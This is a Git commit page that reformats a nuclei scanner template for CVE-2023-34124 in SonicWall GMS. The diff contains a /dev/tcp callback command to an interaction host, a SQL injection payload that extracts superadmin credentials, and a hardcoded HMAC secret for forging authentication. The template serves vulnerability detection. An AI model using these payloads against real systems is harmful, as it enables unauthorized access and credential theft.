daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update CVE-2023-34124.yaml

patch-1
Dhiyaneshwaran 2023-08-28 22:35:22 +05:30 committed by GitHub
parent 5cbc0e4415
commit 6e81e536a3
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 7 additions and 7 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

14
http/cves/2023/CVE-2023-34124.yaml
View File

@ -22,11 +22,11 @@ info:
tags: cve,cve2023,sonicwall,gsm,instrusive
variables:
callback: "echo 1 > /dev/tcp/{{interactsh-url}}/80"
query: "' union select (select ID from SGMSDB.DOMAINS limit 1), '', '', '', '', '', (select concat(id, ':', password) from sgmsdb.users where active = '1' order by issuperadmin desc limit 1 offset 0),'', '', '"
secret: '?~!@#$%^^()'
auth: "{{hmac('sha1', query, secret)}}"
filename: "{{rand_base(5)}}"
callback: "echo 1 > /dev/tcp/{{interactsh-url}}/80"
query: "' union select (select ID from SGMSDB.DOMAINS limit 1), '', '', '', '', '', (select concat(id, ':', password) from sgmsdb.users where active = '1' order by issuperadmin desc limit 1 offset 0),'', '', '"
secret: '?~!@#$%^^()'
auth: "{{hmac('sha1', query, secret)}}"
filename: "{{rand_base(5)}}"
http:
- raw:
@ -77,7 +77,7 @@ http:
name: alias
group: 1
json:
- '.alias'
- '.alias'
- type: regex
part: body
@ -85,4 +85,4 @@ http:
name: servertoken
group: 1
regex:
- "getPwdHash.*,'([0-9]+)'"
- "getPwdHash.*,'([0-9]+)'"